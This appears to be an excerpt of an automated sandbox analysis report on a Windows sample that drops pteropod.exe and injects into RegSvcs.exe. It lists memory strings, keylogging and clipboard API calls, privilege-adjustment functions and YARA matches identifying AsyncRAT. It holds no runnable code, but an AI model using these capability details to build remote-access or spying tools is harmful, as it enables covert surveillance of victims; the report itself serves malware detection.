Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003D8C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1929347646.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003D8C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1929347646.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003D8C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1929347646.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003D8C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1929347646.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000002.00000002.1932432548.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003D8C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1929347646.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003D8C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1929347646.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003D8C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1929347646.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003D8C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1929347646.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 1.2.pteropod.exe.c10000.1.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00459FFF
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 1_2_00459FFF
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_00459FFF
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW, 0_2_00456354
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0047C08E
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_0047C08E
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 5_2_0047C08E

System Summary

Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.pteropod.exe.c10000.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.pteropod.exe.2ec0000.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.RegSvcs.exe.530000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000002.1906683900.0000000000532000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000002.1710132374.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.1877085123.0000000002EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_00434D50
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_004461ED
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004364AA
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 1_2_004364AA
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 5_2_004364AA
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00409A40 0_2_00409A40
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00412038 0_2_00412038
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0047E1FA 0_2_0047E1FA
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0041A46B 0_2_0041A46B
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0041240C 0_2_0041240C
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004045E0 0_2_004045E0
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00412818 0_2_00412818
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0047CBF0 0_2_0047CBF0
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044EBBC 0_2_0044EBBC
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00412C38 0_2_00412C38
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044ED9A 0_2_0044ED9A
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00424F70 0_2_00424F70
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0041AF0D 0_2_0041AF0D
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00427161 0_2_00427161
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004212BE 0_2_004212BE
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00443390 0_2_00443390
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00443391 0_2_00443391
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0041D750 0_2_0041D750
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004037E0 0_2_004037E0
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00427859 0_2_00427859
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040F890 0_2_0040F890
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0042397B 0_2_0042397B
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00411B63 0_2_00411B63
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00423EBF 0_2_00423EBF
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_03E8F2A0 0_2_03E8F2A0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00409A40 1_2_00409A40
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00412038 1_2_00412038
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0047E1FA 1_2_0047E1FA
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0041A46B 1_2_0041A46B
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0041240C 1_2_0041240C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004045E0 1_2_004045E0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00412818 1_2_00412818
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0047CBF0 1_2_0047CBF0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0044EBBC 1_2_0044EBBC
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00412C38 1_2_00412C38
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0044ED9A 1_2_0044ED9A
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00424F70 1_2_00424F70
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0041AF0D 1_2_0041AF0D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00427161 1_2_00427161
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004212BE 1_2_004212BE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00443390 1_2_00443390
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00443391 1_2_00443391
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0041D750 1_2_0041D750
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004037E0 1_2_004037E0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00427859 1_2_00427859
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0040F890 1_2_0040F890
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0042397B 1_2_0042397B
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00411B63 1_2_00411B63
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00423EBF 1_2_00423EBF
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_03E4CA90 1_2_03E4CA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_026BD504 2_2_026BD504
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0A6A0 2_2_06F0A6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0EEEC 2_2_06F0EEEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0AE20 2_2_06F0AE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07049F80 2_2_07049F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070443D8 2_2_070443D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070473F1 2_2_070473F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07086530 2_2_07086530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0708C410 2_2_0708C410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0708A463 2_2_0708A463
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070841A0 2_2_070841A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0708B000 2_2_0708B000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0708BBA9 2_2_0708BBA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07086521 2_2_07086521
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0708AFF0 2_2_0708AFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07144510 2_2_07144510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0714B568 2_2_0714B568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_071495B0 2_2_071495B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07146438 2_2_07146438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0714A468 2_2_0714A468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07148E48 2_2_07148E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07144EE8 2_2_07144EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07146D46 2_2_07146D46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0714CD80 2_2_0714CD80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07143CA8 2_2_07143CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0714EB90 2_2_0714EB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07145A66 2_2_07145A66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07148808 2_2_07148808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_071487F8 2_2_071487F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07143602 2_2_07143602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07143630 2_2_07143630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07148E38 2_2_07148E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07143C98 2_2_07143C98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07141B38 2_2_07141B38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07141B48 2_2_07141B48
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00409A40 5_2_00409A40
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00412038 5_2_00412038
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0047E1FA 5_2_0047E1FA
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0041A46B 5_2_0041A46B
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0041240C 5_2_0041240C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004045E0 5_2_004045E0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00412818 5_2_00412818
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0047CBF0 5_2_0047CBF0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0044EBBC 5_2_0044EBBC
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00412C38 5_2_00412C38
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0044ED9A 5_2_0044ED9A
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00424F70 5_2_00424F70
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0041AF0D 5_2_0041AF0D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00427161 5_2_00427161
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004212BE 5_2_004212BE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00443390 5_2_00443390
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00443391 5_2_00443391
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0041D750 5_2_0041D750
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004037E0 5_2_004037E0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00427859 5_2_00427859
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0040F890 5_2_0040F890
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0042397B 5_2_0042397B
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00411B63 5_2_00411B63
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00423EBF 5_2_00423EBF
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_03BA8A08 5_2_03BA8A08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_02450EC0 6_2_02450EC0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 00425210 appears 56 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 00445975 appears 130 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 0041171A appears 74 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 0041832D appears 52 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 004136BC appears 36 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 004092C0 appears 50 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 0041718C appears 88 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 00401B70 appears 46 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 0040E6D0 appears 70 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 0043362D appears 38 times
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: String function: 00445975 appears 65 times
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: String function: 0041171A appears 37 times
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: String function: 0041718C appears 44 times
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: String function: 0040E6D0 appears 35 times
Source: 7xonkSJwuY.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.pteropod.exe.c10000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.pteropod.exe.2ec0000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.RegSvcs.exe.530000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000002.1906683900.0000000000532000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000002.1710132374.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.1877085123.0000000002EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
